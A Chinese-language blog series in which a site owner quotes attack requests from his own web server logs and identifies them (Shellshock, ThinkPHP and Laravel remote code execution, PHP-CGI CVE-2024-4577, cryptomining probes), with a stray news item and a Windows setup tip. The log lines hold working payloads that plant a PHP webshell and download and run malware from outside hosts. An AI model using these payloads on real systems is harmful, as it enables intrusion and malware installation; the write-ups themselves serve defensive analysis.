從 Web Log 學習系統漏洞 98

Web Log中來自美國 104.131.118.62 的攻擊, 奇怪的是它的網站已經掛掉了:

104.131.118.62 - - [15/Jun/2025:17:18:00 +0800] "GET HTTP/1.1 HTTP/1.1" 400 226 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nZAZAZA\"';system(\"wget -O /tmp/gif.gif http://pjsn.hi2.ro/gif.gif;curl -O /tmp/gif.gif http://pjsn.hi2.ro/gif.gif; lwp-download -a http://pjsn.hi2.ro/gif.gif /tmp/gif.gif;perl /tmp/gif.gif;rm -rf /tmp/gif.gif*;exit\")"

這是一個夾帶在 User-Agent的 Shellshock漏洞攻擊(CVE-2014-6271), 估狗之後發現 10多年前就已經有了, 利用 Shellshock漏洞執行從 http://pjsn.hi2.ro下載不明檔案 gif.gif(這應該是偽裝成圖檔的惡意程式)惡意 Perl指令碼

而這個 http://pjsn.hi2.ro網址是連到俄羅斯, 所以可能是俄羅斯人對原本的 104.131.118.62網站做跳板

從 Web Log 學習系統漏洞 97

在 Web Log中發現來自美國 20.171.207.237的攻擊:

嘗試注入 php後門程式

20.171.207.237 - - [06/Jun/2025:17:21:17 +0800] "GET /public/index.php?function=call_user_func_array&s=%2Findex%2F%5C%5Cthink%5C%5Capp%2Finvokefunction&vars%5B0%5D=system&vars%5B1%5D%5B%5D=echo+%5E%3C%3Fphp+%24action+%3D+%24_GET%5B%27xcmd%27%5D%3Bsystem%28%24action%29%3B%3F%5E%3E%3Ehydra.php HTTP/1.1" 403 225 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"

利用前面的後門下載並執行惡意軟體

20.171.207.237 - - [06/Jun/2025:17:21:19 +0800] "GET /public/hydra.php?xcmd=cmd.exe+%2Fc+powershell+%28new-object+System.Net.WebClient%29.DownloadFile%28%27http%3A%2F%2Ffid.hognoob.se%2Fdownload.exe%27%2C%27%25SystemRoot%25%2FTemp%2Fxfxrucjwcznptjk12592.exe%27%29%3Bstart+%25SystemRoot%25%2FTemp%2Fxfxrucjwcznptjk12592.exe HTTP/1.1" 404 214 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"

執行 FxCodeShell.jsp測試伺服器點

20.171.207.237 - - [06/Jun/2025:17:23:20 +0800] "GET /FxCodeShell.jsp?address=http%3A%2F%2Ffid.hognoob.se%2Fdownload.exe&os=1&view=FxxkMyLie1836710Aa HTTP/1.1" 403 224 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"

20.171.207.237 - - [06/Jun/2025:17:23:23 +0800] "GET /FxCodeShell.jsp::$DATA HTTP/1.1" 403 231 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"

20.171.207.237 - - [06/Jun/2025:17:23:26 +0800] "GET /FxCodeShell.jsp/ HTTP/1.1" 404 214 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"

20.171.207.237 - - [06/Jun/2025:17:23:29 +0800] "GET /FxCodeShell.jsp%20 HTTP/1.1" 403 225 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"

最主要還是偽造 OpenAI, GPTbot的 User-Agent

"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"

前臉書總監指中國介入Meta 審查台港用戶發文

影片來源: 公視新聞網

微軟Windows 11取消bypassnro指令

微軟在 Widows 11 22H2版本之後, 在系統安裝好進行初始化設定時, 可以用 bypassnro指令來跳過強制網路登入微軟帳號綁定系統的步驟, 設定本機帳號即可, 不過最近傳出微軟將於 24H2版本後取消這個指令w-studio.idv.tw

1. 在初始化時, 若無網路連線則無法進行下一步

2. 此時按下 Shift + F10, 叫出命令提示字元, 輸入 oobe\bypassnro後即自動重開機

從 Web Log 學習系統漏洞 96

從西班牙來的傢伙進行加密貨幣挖礦攻擊(Cryptojacking), 攻擊者試圖利用我的伺服器來挖掘Monero (XMR)、以太坊 (ETH)等加密貨幣

以下這些請求來自挖礦軟體, 它們試圖連接我的伺服器並訂閱到一個挖礦池

195.170.172.128 - - [30/Mar/2025:17:15:57 +0800] "\x16\x03\x01\x02" 400 226 "-" "-"

195.170.172.128 - - [30/Mar/2025:17:15:58 +0800] "{\"id\": 1, \"method\": \"mining.subscribe\", \"params\": [\"cpuminer/2.5.1\"]}\n" 400 226 "-" "-"

195.170.172.128 - - [30/Mar/2025:17:16:00 +0800] "{\"id\": 1, \"method\": \"mining.subscribe\", \"params\": [\"MinerName/1.0.0\", \"EthereumStratum/1.0.0\"]}\n" 400 226 "-" "-"

以下是以太坊挖礦協議(Ethereum Stratum)的一部分, 攻擊者嘗試登入他們的以太坊挖礦帳戶, 並使用我的伺服器作為算力來源

195.170.172.128 - - [30/Mar/2025:17:16:01 +0800] "{\"id\":1,\"method\":\"eth_submitLogin\",\"worker\":\"igwrcvap\",\"params\":[\"0x044b879a07547d75de1f3bf0b35a9185d8db4c59\",\"x\"],\"jsonrpc\":\"2.0\"}\n" 400 226 "-" "-"

以下是 Monero(XMR)挖礦軟體 XMRig嘗試登入請求, 攻擊者試圖讓伺服器開始為他們挖礦

195.170.172.128 - - [30/Mar/2025:17:16:03 +0800] "{\"id\":1,\"jsonrpc\":\"2.0\",\"method\":\"login\",\"params\":{\"login\":\"4AXkveLwwqn72xdjbC5ANKF4SypYA4nzKKZo4msYkbotMVFANkRQ2Bsa8aJqncbahb5Z1x11V7ZZiRMThZn2DRhrV3iqmpv\",\"pass\":\"x\",\"agent\":\"XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\",\"algo\":[\"cn/1\",\"cn/2\",\"cn/r\",\"cn/fast\",\"cn/half\",\"cn/xao\",\"cn/rto\",\"cn/rwz\",\"cn/zls\",\"cn/double\",\"cn/ccx\",\"cn-lite/1\",\"cn-heavy/0\",\"cn-heavy/tube\",\"cn-heavy/xhv\",\"cn-pico\",\"cn-pico/tlo\",\"cn/upx2\",\"rx/0\",\"rx/wow\",\"rx/arq\",\"rx/graft\",\"rx/sfx\",\"rx/keva\",\"argon2/chukwa\",\"argon2/chukwav2\",\"argon2/ninja\",\"astrobwt\"]}}\n" 400 226 "-" "-"

只能封鎖 IP 跟關閉 port: 3333、4444

從 Web Log 學習系統漏洞 95

來自不同的地方(烏茲別克、印度、哈薩克、俄羅斯、土庫曼、象牙海岸)作大量相同攻擊, 可能是同一人或組織

84.54.70.166 - - [28/Mar/2025:19:28:02 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"

103.1.103.81 - - [28/Mar/2025:19:55:28 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"

95.59.244.0 - - [28/Mar/2025:20:01:34 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"

188.232.103.100 - - [28/Mar/2025:20:06:02 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"

185.69.185.169 - - [28/Mar/2025:20:09:15 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"

213.230.120.119 - - [28/Mar/2025:20:15:46 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"

95.59.244.0 - - [28/Mar/2025:20:21:17 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"

41.207.204.167 - - [28/Mar/2025:21:30:40 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"

49.47.129.57 - - [28/Mar/2025:22:41:33 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"

經估狗大神解疑, 這是 CVE-2024-4577, 針對 Windows系統的 XAMPP架站套件裡的 PHP-CGI漏洞作注入式指令遠端攻擊 (比較好奇的是怎麼會有 0 的 IP ?)

從 Web Log 學習系統漏洞 94

weblog上一段來自台灣 IP: 1.163.243.200 的攻擊: 

1.163.243.200 - - [14/Mar/2025:19:46:40 +0800] "GET /public/index.php/index?code=O%3A44%3A%22Illuminate%5CFoundation%5CTesting%5CPendingCommand%22%3A4%3A%7Bs%3A10%3A%22%00%2A%00command%22%3Bs%3A6%3A%22system%22%3Bs%3A13%3A%22%00%2A%00parameters%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A2%3A%22cmd.exe+%2Fc+certutil+-urlcache+-split+-f+http%3A%2F%2F26.99.153.102%3A19490%2Fspread.txt+C%3A%5CProgramData%5Cspread.exe+%26%26+C%3A%5CProgramData%5Cspread.exe%22%3B%7Ds%3A6%3A%22%00%2A%00app%22%3BO%3A33%3A%22Illuminate%5CFoundation%5CApplication%22%3A2%3A%7Bs%3A22%3A%22%00%2A%00hasBeenBootstrapped%22%3Bb%3A0%3Bs%3A11%3A%22%00%2A%00bindings%22%3Ba%3A1%3A%7Bs%3A35%3A%22Illuminate%5CContracts%5CConsole%5CKernel%22%3Ba%3A1%3A%7Bs%3A8%3A%22concrete%22%3Bs%3A33%3A%22Illuminate%5CFoundation%5CApplication%22%3B%7D%7D%7Ds%3A4%3A%22test%22%3BO%3A27%3A%22Illuminate%5CAuth%5CGenericUser%22%3A1%3A%7Bs%3A13%3A%22%00%2A%00attributes%22%3Ba%3A2%3A%7Bs%3A14%3A%22expectedOutput%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3B%7Ds%3A17%3A%22expectedQuestions%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3B%7D%7D%7D%7D HTTP/1.1" 404 220 "-" "Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1"

經解碼後得到:

/public/index.php/index?code=O:44:"Illuminate\Foundation\Testing\PendingCommand":4:{s:10:"*command";s:6:"system";s:13:"*parameters";a:1:{i:0;s:2:"cmd.exe /c certutil -urlcache -split -f http://26.99.153.102:19490/spread.txt C:\ProgramData\spread.exe && C:\ProgramData\spread.exe";}s:6:"*app";O:33:"Illuminate\Foundation\Application":2:{s:22:"*hasBeenBootstrapped";b:0;s:11:"*bindings";a:1:{s:35:"Illuminate\Contracts\Console\Kernel";a:1:{s:8:"concrete";s:33:"Illuminate\Foundation\Application";}}}s:4:"test";O:27:"Illuminate\Auth\GenericUser":1:{s:13:"*attributes";a:2:{s:14:"expectedOutput";a:1:{i:0;s:1:"1";}s:17:"expectedQuestions";a:1:{i:0;s:1:"1";}}}}

詢問估狗大神後得知這是一個 CVE-2019-9081 Laravel 反序列化漏洞攻擊, Laravel是一個開源的 PHP Web 框架, 攻擊者可能利用未受信任的反序列化觸發 __destruct(), 進而執行 Artisan指令或系統命令導致遠端代碼執行(RCE), 要防範這類攻擊則建議避免使用 unserialize() 解析外部輸入, 並檢查應用程式是否存在未受信任的反序列化點, 升級 Laravel